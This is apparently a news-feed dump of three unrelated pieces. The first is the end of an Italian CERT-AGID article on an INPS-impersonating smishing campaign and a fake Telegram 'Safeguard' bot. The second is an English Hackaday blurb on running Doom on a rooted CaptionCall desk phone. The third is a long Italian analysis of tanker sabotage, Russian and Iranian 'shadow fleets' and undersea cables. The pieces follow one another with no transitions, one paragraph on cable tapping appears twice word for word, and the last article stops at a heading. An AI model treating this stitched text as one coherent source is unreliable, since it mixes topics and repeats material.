La conferma del collegamento arriva visitando direttamente l’indirizzo IP, dove la pagina presenta contenuti e il logo di INPS usati per la truffa.

Un ulteriore dettaglio interessante riguarda i link presenti nel menu superiore, che rimandano tutti a un altro dominio inps[.]st, anche questo risulta essere stato registrato di recente.

Conclusioni

La truffa Safeguard e il collegamento alla truffa INPS mettono in luce come questo gruppo di criminali informatici stia sfruttando contemporaneamente due tipologie distinte di frodi per ottenere accesso alle informazioni delle vittime. Nel primo caso, attraverso bot fraudolenti, cercano di ottenere l’accesso agli account Telegram, mentre nel secondo caso mirano al furto di documenti d’identità tramite campagne di smishing.

Indicatori di Compromissione

Gli IoC relativi a questa campagna sono stati già condivisi con le organizzazioni accreditate al flusso IoC del CERT-AGID.

Link: Download IoC

L'articolo Truffa e smishing che impersona l’INPS: il falso Safeguard ruba dati e installa malware proviene da il blog della sicurezza informatica.

Pour one out for yet another device conquered. This one’s a desk phone for conferences and whatnot, a colour display, a numpad, and a bog standard handset with a speaker and mic. Naturally, also running Linux. You know what to expect – [Parker Reed] has brought Doom to it, and you’d be surprised how playable it looks!

This is the second time a CaptionCall device has graced our pages running Doom — CaptionCall patched out the previous route, but with some firmware dumping and hashcat, root has been acquired once again. [Parker] has upgraded this impromptu gaming setup, too – now, all the buttons are mapped into Doom-compatible keyboard events coming from a single input device, thanks to a C program and an Xorg config snippet. Feel free to yoink for your own Doom adventures or just general CaptionCall hacking!

If you’re interested in the hacking journey, get into the exploitee.rs Discord server and follow the hack timeline from password recovery, start to finish, to Doom, to the state of affairs shown in the video. Now, as the CPU speeds have risen, should the hackerdom switch away from Doom as the go-to? Our community remains divided.

youtube.com/embed/t5-X1oKxfK0?…

hackaday.com/2025/03/02/a-capt…

Nella notte tra il 14 e il 15 febbraio la nave SeaJewel (imo:IMO 9388807) sotto bandiera maltese, ha subito un sabotaggio sotto la linea di galleggiamento mentre era ormeggiata al campo di boe del porto di Vado Ligure (Savona). Il danneggiamento sullo scafo – una falla di oltre un metro e mezzo come riporta la stampa – sembra essere stato provocato da due esplosioni ritardate e separate (20 minuti) tramite esplosivo caricato dall’esterno. Insieme alla Seajewel risultava presente anche la Seacharm (IMO:9773765), sotto bandiera Marshall Islands. La Seacharm proveniva dalla Libia e a sua volta aveva subito un sabotaggio al largo del porto turco di Cheyan tra il 18 e il 19 gennaio.

I due incidenti – in tempi ravvicinati – che sollevano la questione se la società Thenamaris – quale gestore delle due navi e al 2022 collegata agli interessi del CEO Nikolas Martinos – sia stata presa di mira, coinvolgono mezzi che recentemente hanno fatto scalo in Russia, nel terminal di Novorossiysk, continuando a traportare petrolio russo nonostante le sanzioni legate alla guerra in Ucraina. L’UE ha, infatti, chiuso i suoi porti ad oltre 2.800 navi dell’intera flotta mercantile russa e messo al bando ‘il trasporto marittimo di petrolio greggio russo verso paesi terzi’ . Il divieto, tuttavia, non si applica se il petrolio greggio o i prodotti petroliferi sono acquistati a un prezzo pari o inferiore al tetto sui prezzi del petrolio.

La Seajewel ha caricato merci russe almeno tre volte nel 2024 (a febbraio, marzo e maggio) ed è stata avvistata mentre scaricava nel porto di Constanța – parliamo anche di questo dopo – dopo essere arrivata dal porto di Ceyhan. Altre due navi hanno subito sabotaggi in mare. Cosa sta succedendo?
Fonte immagine: Vessel Finder, Seajewel Fonte immagine: Vessel Finder, Sea Charm
Molti di noi sono abituati a vedere il mare, con i suoi bei tramonti, come pura funzione illustrativa, tuttavia il nostro Federico Fellini sapeva bene che il mare non solo può riempire un’intera struttura narrativa, ma che – come riporta Roberto Nepoti in ‘Fellini e il mare’ – sul mare avvengono nefandezze, “il mare (vd. La Nave va) e è il teatro dell’apocalittico finale (otto minuti e mezzo), dove l’attentato di un giovane serbo a un incrociatore austro-ungarico produce in risposta il cannoneggiamento della nave, ponendosi come metafora dello scoppio (siamo nel 1913) della Grande Guerra”.

“It doesn’t matter if a cat is black or yellow, as long as it catches mice”. _ Deng Xiaoping

Il mare come terra, aria, spazio e cyber occupa il suo posto d’onore nella guerra ibrida e coinvolge tutti gli attori in gioco. Ed in questo gioco occupa uno spazio anche la propaganda anche dell’underground. Difficile e complesso comprendere chi ne stia beneficiando, ma ricordiamoci che se i gatti nella prima guerra mondiale hanno aiutato i soldati a tenere le trincee libere dai roditori, la metafora occidentale in Oriente, più precisamente secondo Deng Xiaoping, pioniere della riforma economica in Cina – viene letta tutta in un altro modo: il topo è la prosperità dell’intera società, il gatto – stato confuciano in Oriente – è il modo per ottenerla. Chi è il gatto in Occidente?

IN BREVE:

• Sabotaggi tra petroliere, navi militari e cavi sottomarini
• Telecomunicazioni, cavi sottomarini, spionaggio e pedinamenti
• ‘Waterworld’: le tensioni per il predominio marittimo ed energetico
• “Flotte ombra” e il così detto prezzo massimo di 60 dollari al barile
• Caratteristiche e tendenze specifiche delle navi ombra
• La posizione strategica dell’Italia
• Difficili da arrestare
• I sabotaggi di Seajewel, Seacharm, Grace Ferrum e Suezmax, guerra commerciale o “controlli più rigorosi”?
• La grande vendita di navi greche allo scoppio del conflitto russo-ucraino
• Cui prodest
• Bibliografia

Immagine: NoName e DdoS ai porti italiani, 17 e 20 febbraio 2025 oltre che ai trasporti pubblici.

Sabotaggi tra petroliere, navi militari e cavi sottomarini

La notizia del sabotaggio in mare italiano – avvenuto dopo quelli analoghi della Grace Ferrum (IMO: 9667928) gestita dalla compagnia Cymare, al largo della costa libica all’inizio di febbraio e della Suezmax (IMO: 9234642) nel porto baltico russo di Ust-Luga e quello di dicembre della nave cargo Ursa Major (IMO:9538892) sanzionata (2022 USA e 2023 UK) gestita dalla società russa Oboronlogistika e parte delle operazioni di costruzione militare del Ministero della Difesa russo (affondata nel mediterraneo, ultimo segnale AIS 23 dicembre ore 00:14), o l’incidente subito dalla Koala (IMO:9234642) del 9 febbraio sempre al terminal Ust-Luga – desta non poche preoccupazioni. La Koala gestita dalla cipriota Lagosmarine, mentre il proprietario nominale risulta un cittadino greco ha come vero proprietario il cittadino lettone Alexey Khalyavin, le cui società sono tra le maggiori acquirenti di petrolio russo aggirando il tetto massimo dei prezzi. Ad accusare Lagosmarine – inclusa nell’elenco delle sanzioni americane come parte della flotta ombra russa – di trasportare petrolio iraniano nell’interesse del Corpo delle guardie rivoluzionarie islamiche e del gruppo sciita filo-iraniano Hezbollah, è stato Israele.

Dietro ai sabotaggi si troverebbe un disegno ben organizzato – che ci ricorda la prima guerra mondiale o quella ispano-americana – si relaziona non solo con le navi che hanno fatto scalo recentemente nei porti russi ma che si estende al sabotaggio dei cavi elettrici e sottomarini in un panorama geopolitico sempre più teso, non ultimo quello del Mar Baltico (Estlink 2), che avrebbe coinvolto la petroliera russa Eagle S (IMO:9329760) che le autorità finlandesi hanno descritto come parte della “flotta ombra” di Mosca, quello che ha invece coinvolto la Yi Peng 3 (IMO:9224984) e i cavi sottomarini nel Mar Rosso, tra Gedda, in Arabia Saudita, e Gibuti, nell’Africa orientale.

Ovviamente tutti questi casi non sono una coincidenza anche se bisogna dire che gli incidenti ai cavi sottomarini, potrebbero essere sì intenzionali, ma conseguenza di attrezzature impigliate, cosa meno eccitante ma reale. Infatti per scoraggiare questo comportamento, viene ripagata l’attrezzatura da parte degli operatori per evitare le manomissioni. Caso che non si può applicare invece al sabotaggio del Nord Stream, all’attacco dell’oleodotto Niger Blend – dopo un avvertimento emesso dal Patriotic Liberation Front (FPL) – e il seguente incidente al Balticonnector accidentalmente danneggiato da una nave cinese, ma si sa i cinesi non sono grandi navigatori).

Altro sabotaggio quello relativo invece alla nave militare tedesca Hessen – progettata per contrastare gli attacchi aerei e che ha contribuito a proteggere le navi nel Mar Rosso contro gli Houthi – che ha subito un tentativo di contaminazione del sistema idrico con decine di litri di olio esausto e alla cui indagine partecipa il BAMAD, controspionaggio che conduce anche operazioni ibride, soprattutto nel campo della difesa informatica.

Se poi si aggiunge che dall’inizio di gennaio l’Areonautica italiana – e successivamente dalla Guardia di Finanza e la Marina degli Stati Uniti a metà febbraio – hanno iniziato (vd. Italmilradar) a monitorare il passaggio del sottomarino russo Krasnodar B-265 (accanto al quale ha navigato il rimorchiatore il Churov per dirigersi al largo della costa di Sollum, in Egitto) e l’area della sua navigazione (tra la Sardegna e l’Algeria), la situazione si complica parecchio in materia di sicurezza marittima e diritto internazionale, evidenziando estreme tensioni e sfide strategiche di cui l’Europa, ma soprattutto l’Italia, che bagna con disagio il suo stivale in un’area di primaria importanza per le relazioni esterne in un’invidiabile posizione tra lo stretto della Sicilia e quello di Otranto, che conducono dall’Indo-Pacifico attraverso Suez al cuore iperproduttivo dell’Europa, e le posizioni dei porti di Genova e Trieste di accesso alle spedizioni verso l’area dell’Europa centrale, punti ai quali arrivano le importazioni di materie prime estere e le cui rotte sono garantite dalla ‘supremazia navale’ degli Stati Uniti. La lista non finisce qui.

Anche il cavo sottomarino di Rostelecom sarebbe stato danneggiato, la dichiarazione- che segue alle accuse alla russa Eagle S – è stata fatta l’8 di febbraio e ha fatto risalire l’incidente ad almeno un mese prima.

Ovviamente la per il predominio tra Occidente e Cina minaccia l’equità digitale e la sicurezza dei cavi sottomarini: se l’americana SubCom, la giapponese NEC Corporation e la francese Alcatel Submarine Networks, hanno storicamente dominato la posa dei cavi sottomarini in fibra ottica, ora la Cina è entrata potentemente nel mercato.

Telecomunicazioni, cavi sottomarini, spionaggio e pedinamenti

Una nota: i cavi sottomarini – che si traducono in miliardi di dollari di produttività e informazioni – possono essere altamente vulnerabili a una serie di fattori, non solo ad incidenti fisici. Un’ancora gettate nel posto sbagliato può fare grandi danni, ma si pensa poco ai danni relativi all’hacking e alla raccolta di informazioni di intelligence. In questi cavi – con l’aiuto dei sottomarini – possono essere praticate piccole fessure per inserire dispositivi di ascolto e raccolta dati: attraverso i cavi si possono rintracciare telefonate, e-mail, transazioni finanziarie e la crittografia che li protegge può essere violata. Lo fecero gli USA durante la guerra fredda come parte dell’Operazione Ivy Bells, lo fece l’agenzia inglese GCHQ nel 2013 e nel 2015 furono intercettati dei sottomarini russi vicino ai cavi. Non ultime le accuse del National Computer Virus Emergency Response Center cinese nel report “Lie To Me” che ha per oggetto l’operazione Volt Thypoon e che accusa gli USA di operazioni di monitoraggio dei cavi in ​​fibra ottica sottomarini istituite e gestite dalla NSA (tra cui il progetto UpStream) che convertirebbe e tradurrebbe il traffico di trasmissione nel cavo in fibra ottica sottomarino in informazioni di intelligence leggibili e recuperabili in tempo reale.

Si ricorda inoltre che nel 2020 gli Stati Uniti hanno impedito il progetto di Google e Facebook di un cavo sottomarino che collegasse gli Stati Uniti e Hong Kong.

Oggetto delle più recenti attività marittime è stata la nave di sorveglianza russa Yantar, nave che è stata seguita dalla HMS Somerset della Royal Navy il 22 gennaio 2025 e vicino alla quale e stato ordinato di fare emergere un sottomarino, a causa della posizione strategica in cui navigava, ovvero su infrastrutture sottomarine critiche nella zona economica esclusiva (ZEE) del Regno Unito.

Una nota: i cavi sottomarini – che si traducono in miliardi di dollari di produttività e informazioni – possono essere altamente vulnerabili a una serie di fattori, non solo ad incidenti fisici. Un’ancora gettate nel posto sbagliato può fare grandi danni, ma si pensa poco ai danni relativi all’hacking e alla raccolta di informazioni di intelligence. In questi cavi – con l’aiuto dei sottomarini – possono essere praticate piccole fessure per inserire dispositivi di ascolto e raccolta dati: attraverso i cavi si possono rintracciare telefonate, e-mail, transazioni finanziarie e la crittografia che li protegge può essere violata. Lo fecero gli USA durante la guerra fredda come parte dell’Operazione Ivy Bells, lo fece l’agenzia inglese GCHQ nel 2013 e nel 2015 furono intercettati dei sottomarini russi vicino ai cavi. Non ultime le accuse del National Computer Virus Emergency Response Center cinese nel report “Lie To Me” che ha per oggetto l’operazione Volt Thypoon e che accusa gli USA di operazioni di monitoraggio dei cavi in ​​fibra ottica sottomarini istituite e gestite dalla NSA (tra cui il progetto UpStream) che convertirebbe e tradurrebbe il traffico di trasmissione nel cavo in fibra ottica sottomarino in informazioni di intelligence leggibili e recuperabili in tempo reale.

‘Waterworld’: alcune tensioni per il predominio marittimo ed energetico

E’ necessario prima di tutto chiarire che nei mari globali le tensioni rimangono elevate e coinvolgono diverse nazioni, non ultime in questi giorni la Cina e l’Australia in materia di esercitazioni navali controllate. Ogni anno, i confini marittimi diventano un punto sempre caldo tenendoci con il fiato sospeso nel dubbio che queste tensioni possano alimentare una una crisi marittima più ampia.

Queste dispute sono vissute recentemente anche all’interno dei confini europei:

• tensioni Turchia-Grecia e Cipro, in gran parte pacifiche ma in attesa di risoluzione completa e al 61mo round di colloqui.
• ruoli e interessi dell’UE e degli USA nel Mediterraneo orientale (punto caldo e ponte per il commercio tra Europa e Asia.
• competizione energetica e controversie nel Mediterraneo orientale che coinvolgono: Turchia, Grecia e Cipro, ma coinvolge anche Egitto, Libia, Israele, Italia, Francia e Germania. (Dobbiamo qui ricordare che la Turchia con l’ambizione di Hub energetico per l’Europa ed esclusa dai piani (2021) di Cipro, Egitto, Israele e Grecia di realizzare un gasdotto verso l’Europa, ha sempre più adottato azioni unilaterali, provocando risposte da Grecia e Francia).

A ciò si aggiungono le recenti scoperte di gas naturale al largo della Libia: nel dicembre 2019, la Turchia ha firmato un accordo di delimitazione marittima con il governo libico riconosciuto dall’ONU e ha anche inviato consiglieri militari per aiutare il governo di Tripoli nella sua lotta con gli avversari nella Libia orientale, sostenuta da Egitto ed Emirati Arabi Uniti. Se Israele, Egitto, Grecia e altri membri dell’UE temono che le azioni della Turchia possano minare il gasdotto EastMed (che esporterebbe gas israeliano e cipriota in Grecia e poi in Europa, che ha suscitato anche critiche da parte degli attivisti verdi, come anche Extinction Rebellion che spinge per una più rapida eliminazione dei combustibili fossili), vi è stato anche un rafforzamento della cooperazione (e settore militare) Haftar/Russia, punto di forza per la Russia per gestire la propria presenza in Cirenaica e zona del Sahel. Questo complica l’attuazione del piano Mattei italiano soprattutto la ricerca di alternative dell’Europa al gas russo che incontra gli interessi di Grecia, Cipro, Israele, Egitto e Turchia che invece guarda ad un vecchio piano per trasportare gas del Qatar in Europa attraverso Arabia Saudita, Giordania, Siria e Turchia.

Come si osserva la situazione è molto complessa e vede numerosi attori in gioco statali e non.
Fonte immagine: Depa International Projects
A ció possiamo ancora accostare la cosiddetta rinascita degli Stati Uniti, che dopo avere eroso la sua posizione nel Mediterraneo orientale con la normalizzazione regionale tra Israele e i paesi arabi (2022) e la mediazione dell’accordo di delimitazione marittima tra Israele e Libano, ha aumentato i suoi dispiegamenti come deterrenza, allo scoppio della geurra russa-ucraina (minaccia NATO) e israelo-palestinese (minaccia Iran) e alla ‘crescita’ dell’influenza cinese, obiettivo NATO evidenziato a Madrid.

“Flotte ombra” e il così detto prezzo massimo di 60 dollari al barile

Se ancora non sono chiare le intenzioni del sottomarino russo Krasnodar B-265, tra dimostrazioni o normale operatività nel Mediterraneo e quali siano i porti sicuri che si sia assicurato per rifornirsi, sembrano diventare sempre più evidenti le relazioni tra la navi che hanno subito recenti incidenti o manomissioni, collegate a flotte che hanno il preciso obiettivo di aggirare le sanzioni economiche in corso e operare così in una zona grigia per il trasporto di materie prime energetiche. Tuttavia queste imbarcazioni non trasportano solo petrolio russo, ma in passato sono stati frequenti i casi di coinvolgimento nel trasporto di petrolio venezuelano e iraniano o di trasporto di petrolio verso la Nord Corea, nonostante le sanzioni internazionali. La loro presenza nel Mar Mediterraneo, compresa l’Italia, è stata sempre più notata negli ultimi anni. Il Mediterraneo è infatti zona strategica per il trasporto di petrolio a causa della sua vicinanza alle principali regioni produttrici come Nord Africa e Medio Oriente e alle principali rotte di navigazione che collegano Europa, Asia e Africa. Sebbene l’Italia non rappresenti in sé non sia un importante hub per le loro attività ci sono stati casi di petroliere che hanno attraccato nei suoi porti o operato nelle acque italiane, utilizzando documentazione falsa o dichiarando erroneamente il loro carico per evitare controlli. A queste dovremmo aggiungere le famose navi dei veleni che – dagli anni ‘70 – hanno partecipato alladispersione illegale di rifiuti tossici nei nostri mari Ionio e Adriatico dietro uno schema ben preciso di affondamenti. Ma questa é un’altra interessante storia.

Fonte immagine: Nautica Report, Le navi dei veleni: più di trenta le navi affondate nei fondali.

Le vendite di petrolio russo secondo quanto evidenziato da Andriy Klymenko, capo del gruppo di monitoraggio del Black Sea Institute for Strategic Studies, non sono diminuite a causa delle sanzioni dell’Unione Europea, ma “in seguito agli attacchi con droni a lungo raggio delle forze armate ucraine sul principale porto di esportazione russo di Ust’-Luga”. Questo ha portato le navi ad utilizzare un altro porto ‘Primorsk’, nella regione di San Pietroburgo”. Tuttavia Klymenco ha fatto notare che “un terzo del volume di petrolio greggio russo proveniente dai porti del Mar Baltico viene trasportato in tutto il mondo da petroliere provenienti dai paesi dell’UE e della NATO. Naturalmente non lo trasportano in Europa, ma in India, Turchia e Cina. Conosciamo ogni petroliera, i suoi proprietari, fino all’indirizzo dell’ufficio dell’armatore. Si tratta di cinque note aziende greche, di proprietà di miliardari greci”. Dopo le compagnie greche ci sono quelle della Federazione russa, e altre registrate negli Emirati Arabi Uniti, a Dubai. “Non è un segreto che 1.500 aziende russe abbiano nuovamente registrato la propria sede a Dubai”. Poi ci sono le navi registrate in Azerbaigian: “14 petroliere appartenevano a società registrate in questo paese, 9 in Cina, principalmente a Hong Kong, 9 in India, 8 in Turchia, 3 in Vietnam e 1 in Kazakistan”.

Azerbaigian, Cina, Turchia, Vietnam, Kazakistan possiedono molte navi che hanno più di 15 anni, se uscisse un regolamento che stabilisse che non possono essere più usate, “queste uscirebbero immediatamente dal gioco”.

Sempre secondo Klymenko solo una petroliera su 96 potrebbe essere considerata una petroliera della “flotta fantasma”, perché era immatricolata in uno dei cosiddetti paesi con “bandiera di comodo”. “Si tratta semplicemente di giurisdizioni offshore. In genere ce ne sono da 6 a 9 su 100”. Molte non vengono registrate insieme ai volumi reali secondo Klymenco “gli occidentali utilizzano l’intelligenza artificiale, per elaborare tutte le informazioni,[…] probabilmente sono ancora in tempi di pace, non tengono conto dell’impatto della guerra elettronica russa sulle prestazioni di questi sistemi di informazione marittima, perché distorce i segnali o li nasconde”. Poi ci sono anche i casi in cui l’equipaggio della petroliera disattiva il sistema di allerta precoce, impedendo così la registrazione del porto di partenza. Infine per Klymenko non esistono sanzioni sul petrolio e sui prodotti petroliferi russi. “C’è un embargo: i paesi da cui arrivano le sanzioni semplicemente si rifiutano di acquistare petrolio oltre al tetto massimo, un formato impossibile da rispettare, perchè non esiste alcun meccanismo di verifica. L’India, ad esempio, non ha promesso nulla a nessuno.

Caratteristiche e tendenze specifiche delle navi ombra

Per eludere sanzioni, regolamenti e controlli le ‘flotte ombra’ sono solitamente coinvolte nel trasporto di petrolio o altre materie prime per vari paesi e si distinguono dalle petroliere convenzionali per una serie di caratteristiche e tendenze specifiche tra cui:

• la data della costruzione (15 anni o anche più), spesso anche caratterizzate da una cattiva manutenzione,
• la proprietà offuscata o anonima (utilizzo dei “registri aperti”, che consentono alle navi di essere registrate in paesi senza alcun collegamento con il proprietario o il suo paese di origine,
• stesso numero IMO ma nome modificato (cambio di nome o di registrazione frequente),
• oscuramento IMO,
• bandiere di comodo e cambio frequente di bandiera (es.Panama, Malta, Liberia, Comore, Isole Marshall), che rappresentano il 40% della capacità di trasporto mondiale.
• navigazione di rotte di spedizione complesse,
• l’elusione o la manipolazione dei segnali di identificazione automatica (AIS) per evitare o rendere complesso il tracciamento e il monitoraggio (spegnimento del segnale gps prima di attraccare al porto),
• utilizzo di trasferimenti nave/nave (STS) – es. petrolio tra navi – per oscurare la destinazione del carico,
• navigazione con rotte insolite o complesse per rendere difficile l’individuazione
• possibile mancanza di assicurazione,
• transazioni non trasparenti dei pagamenti del carico,
• documenti di carico falsi o manipolati per mascherare origine o destinazione del carico.

Inoltre il numero IMO (univoco e di 7 cifre) di una nave – e collegato in modo visibile al suo scafo – è destinato a essere permanente indipendentemente da un cambio di proprietà o nome della nave ed è separato e diverso dal numero ufficiale rilasciato dall’amministrazione di bandiera della nave che è utilizzato solo internamente: le navi ‘ombra’ hanno spesso dipinto sopra i nomi delle navi e i numeri IMO per oscurare la propria identità e spacciarsi per navi diverse.

Fonte immagine: Clarksons Tanker Register, 2023., le dimensioni della flotta di petroliere al 2023.

Bisogna notare inoltre che i tre stati di bandiera più grandi per tonnellate di portata lorda sono: Liberia, Isole Marshall e Panama e tutti e tre hanno tutti un’affiliazione storica con gli Stati Uniti e hanno un patto di condivisione delle informazioni se sospettano che una petroliera stia partecipando al commercio di petrolio sanzionato per impedire a queste petroliere di fare “flag shopping”. Secondo un report del 2024 del Congressional Reserve Service “I registri di Liberia, Isole Marshall, Panama, Bahamas e Honduras sono le uniche navi battenti bandiera straniera che ricevono un’idoneità speciale per la copertura assicurativa contro i rischi di guerra fornita dal governo degli Stati Uniti”. Bandiere invece come quelle di Gabon, Palau e le Isole Cook, sono state spesso sanzionate per cui vengono il più delle volte evitate. La scelta tocca poi le transazioni delle “banche che scambiano i fondi tra gli acquirenti e i venditori di petrolio, le banche infatti devono confermare che la nave soddisfi gli standard di classificazione”.

Fonte immagine: Marine Traffic

Molte delle navi sanzionate vengono inserite in liste grigie a causa di irregolarità per: problemi al motore, agli ammortizzatori, al cruscotto, a taluni equipaggiamenti, ect. Se queste irregolarità si sommano invece finiscono nelle liste nere, ovvero di petroliere che necessitano il più delle volte di riparazioni immediate.

La posizione strategica dell’Italia

La posizione strategica dell’Italia, al centro del Mediterraneo, la rende un punto di transito chiave per le spedizioni di petrolio in Europa, Nord Africa e Medio Oriente e inoltre è relativamente vicina a Paesi come Libia (punto caldo di commercio illegale), Siria e Iran (in particolare trasferimenti STS), che sono spesso coinvolti in operazioni di flotta oscura a causa delle sanzioni internazionali. La domanda di petrolio a basso costo è una delle origini del mercato delle flotte ombra e la natura segreta ed evasiva di queste operazioni rende difficile sradicarle. L’Italia collabora strettamente con l’Unione Europea e la NATO per monitorare e contrastare l’attività della Dark Fleet nel Mediterraneo e ciò include la condivisione di intelligence e la conduzione di pattugliamenti congiunti. Nel 2020, ad esempio, una petroliera che trasportava petrolio libico è stata trattenuta in Sicilia con l’accusa di aver violato le sanzioni dell’UE.

Difficili da arrestare

Queste pratiche sono state evidenziate ad esempio nel gennaio 2024 relativamente all’identificazione tramite tecnologia satellitare di 383 vascelli, di cui 189 con bandiera panamense che trafficavano petrolio iraniano, parte di una ‘flotta fantasma’, di cui il Senato US ha richiesto l’immediato controllo all’autorità marittima di Panama.

Sempre riguardo il petrolio irarniano sono emerse informazioni importanti da una serie di oltre 10.000 e-mail da un leak di Sahara Thunder, società di facciata iraniana – che spedisce merci per conto del MODAFL – Ministero della difesa e della logistica delle forze armate – a più giurisdizioni, tra cui la Repubblica Popolare Cinese (RPC), la Russia e il Venezuela – che descrivono il suo commercio di petrolio dal marzo 2022 al febbraio 2024. le reti di evasione delle sanzioni occidentali, la flotta di navi, le operazioni di vendita di petrolio, i processi di rigassificazione, le figure chiave all’interno dell’azienda e il loro commercio di armi con la Russia, nonché porterebbero prove dei legami di Sahara Thunder con le attività del MODAFL. Così la Sahara Thunder ha stipulato contratti di noleggio a tempo con Zen Shipping & Port India Private Limited con sede in India per la nave battente bandiera delle Isole Cook CHEM (IMO 9240914), operata da Safe Seas Ship Management FZE con sede negli Emirati Arabi Uniti che gestisce anche la DANCY DYNAMIC (9158161) con bandiera di Palau, la K M A (9234616) con bandiera delle Isole Cook e la CONRAD (9546722) con bandiera delle Isole Cook, tra le altre.

Allo stesso modo seguendo la stessa logica dei movimenti di petrolio iraniano possiamo farlo per la flotta ombra che trasporta merci per conto della Russia. Analizziamo quindi alcune delle navi che riportano comuni caratteristiche, tra cui proprio la SeaJewel messe in correlazione con i recenti incidenti e manomissioni subiti.

In ultimo analizzando uno dei porti di attracco della SeaJewel c’è un’altra storia che emerge, al porto di Costanta (Romania) sul Mar Nero, per capire che queste pratiche avvengono da anni e sono aumentate dopo lo scoppio del conflitto russo-ucraino.

Nel 2023, viene riportato da context.ro, un imprenditore rumeno, Gheorghe Bosînceanu – che appariva nei Paradise Papers come beneficiario dei servizi di Appleby, un fornitore internazionale di servizi legali offshore e che aveva già avuto una controversa transazione nel 2002 con il governo rumeno riguardo un cantiere navale – controllava una flotta dietro un labirinto di società registrate in giurisdizioni offshore per trasportare petrolio russo. Il suo nome è emerso dietro una società quotata in borsa (Histria Management) a cui appartiene la flotta navale, registrata in un paradiso fiscale e le cui navi petrolifere operavano dal porto di Costannte in Romania, trasportando petrolio russo verso l’Europa e soprattutto verso la Turchia.

La scoperta è avvenuta dopo l’indagine internazionale, “Fueling the war” , che ha rivelato che un’entità rumena era inclusa in una lista di aziende che trasportavano petrolio russo dopo le sanzioni a Mosca. Ma nella lista non compare solo la società rumena, bensi parecchie società dislocate in altri paesi europei. I dati analizzati da Investigate Europe riferibili al 2022 mostrano che la maggior parte delle spedizioni dai porti russi sono state effettuate da navi di proprietà di società di Grecia, Cina ed Emirati Arabi Uniti. “In termini di capacità di carico” evidenzia Context “le società greche Tms Tankers Ltd e Minerva Marine Inc, insieme a Scf Management Services Dubai, sono le prime tre compagnie russe di combustibili fossili dall’inizio della guerra”. Le sanzioni – contro Venezuela, Iran e Russia – hanno reso necessari viaggi medi più lunghi per il petrolio trasportato via mare, nel caso del petrolio russo e della sua flotta ombra, la dimensione preferita è Aframax (vd. Seajewel) e per questo tipo di petroliere i prezzi nel 2022 erano quasi triplicati rispetto agli anni precedenti.

Altre navi sanzionate fanno parte delle black list registrate nel Mar Baltico per la limitazione del traffico petrolifero russo a Dicembre 2022, 167 navi di cui la maggior parte (126) registrate in Grecia, Seychelles, Turchia, Cina, Marshall Islands.

I sabotaggi di Seajewel, Seacharm, Grace Ferrum e Suezmax, guerra commerciale, mine nei mari o “controlli più rigorosi”?

Tra il 17 e il 18 gennaio 2025 la Seacharm (IMO:9773765) subisce un’esplosione mentre naviga al largo del porto turco di Ceyhan, naviga poi verso la Grecia, probabilmente diretta al cantiere dove rimane circa 10 giorni, presso i cantieri navali di Skaramangas, dove è stata sottoposta a riparazioni dal 20 al 30 gennaio, sino a fine gennaio secondo Lloyd Intelligence.

Da lì naviga verso la Libia, dove preleva un carico e risulta poi essere a Savona insieme alla Seajewel (IMO: 9388807) che subisce due esplosioni a scoppio ritardato.Entrambe le navi sono gestite da Themaris: il punto in comune si trova al terminal di Novorossiysk, in Russia. Ma Themaris si trova in buona compagnia: sempre in febbraio ad essere stata presa di mira è stata la petroliera russa Suezmax (IMO: 9234642) nel porto baltico russo di Ust-Luga. La Grace Ferrum (IMO: 9667928) – proprietà elencata da Equasis come tramite Grace Ferrum Shipping in Liberia, con la gestione ISM da Cymare Navigation negli Emirati Arabi Uniti – invece ha subito esplosioni al largo della costa libica sempre all’inizio di febbraio: proveniva dai porti di San Pietroburgo e Ust-Luga. Cosa unisce questi vascelli? TradeWinds nel 2023 aveva riferito che la Grace Ferrum era stata acquisita da Grace Energy, fondata dall’armatore poco conosciuto Stanislav Raspopov – ‘ex analista commerciale e agente marittimo del gruppo Navig8 che aveva fondato la società ad Atene e Dubai per controllare una flotta di petroliere MR rapidamente accumulata. Documenti depositati presso la Companies House del Regno Unito mostrano che Raspopov era un cittadino russo prima di diventare cittadino greco residente a Londra nel 2022. Grace Energy – sempre secondo TradeWinds – rispetta sempre le normative occidentali sulle spedizioni di petrolio, incluso il tetto massimo del prezzo del petrolio russo.

Si tratta di una guerra commerciale o di una conseguenza di un “controllo più rigoroso delle operazioni marittime?”. Entrambe le ipotesi, da quanto abbiamo analizzato sin qui, sembrano possibili, tuttavia vi sono speculazioni che si tratti di operazioni di sabotaggio sostenute dall’Ucraina. La società di intelligence Ambrey Analytics ha affermato che non tutti gli obiettivi sono stati designati nell’ambito di programmi di sanzioni, ma i rischi attualmente sono “valutati come sostanziali”. Questi incidenti sono i primi che coinvolgono navi non militari nella regione da tempo, tempi in cui le navi erano vulnerabili a causa delle “mine piazzate nel Mar Baltico, nel Mare del Nord, nel Mediterraneo e nel Mar Nero”impiegate nella guerra marittima.

Relativamente alla questione è un articolo su MarketScreener che parla di mine a mignatta (di tipo BPM 1 o BPM 2) o mine a patella che vengono “attaccate alle navi con dei magneti e di solito contengono esplosivi TNT (trinitrotoluene) che vengono attivati con un timer, ha detto una delle fonti”.

Approfondendo, sempre secondo Lloyd Intelligence le navi della Thenmaris navigano nella legalità, oltre al fatto che “rimane del tutto legittimo trasportare greggio russo fintanto che rispetta il tetto massimo di prezzo di 60 $ al barile. È anche consentito sollevare greggio prodotto da ex costituenti dell’Unione Sovietica, come il Kazakistan, che spesso vengono ancora gestiti nei terminal russi”. Infatti la Seajewel ha fatto sì scalo in Russia l’anno scorso, ma si sarebbe trattato dl sollevamento della miscela di greggio CPC kazako dal Black Sea Caspian Pipeline Consortium.

Questo è il tipo di operazioni del tutto legali ed etiche intraprese da Thenamaris (aframax) che se anche ‘operando regolarmente’ è stata inserita in un lista di cinque compagnie di navigazione greche nell’elenco degli “sponsor di guerra internazionali” dall’Agenzia nazionale per la prevenzione della corruzione ucraina (NACP), con le accuse di trasportare “petrolio e prodotti petroliferi russi, alimentando così il bilancio dello Stato terrorista e finanziando l’aggressione russa”.

Nella lista si trovanola Minerva Marine, la Thenamaris, la TMS Tankers a cui si aggiunge la Dynacom Tankers Management Ltd.

Il 30% delle petroliere – sottolinea Klymenko – che servono alle esigenze del complesso militare-industriale russo batte bandiera greca ogni mese.

La grande vendita di navi greche allo scoppio del conflitto russo-ucraino

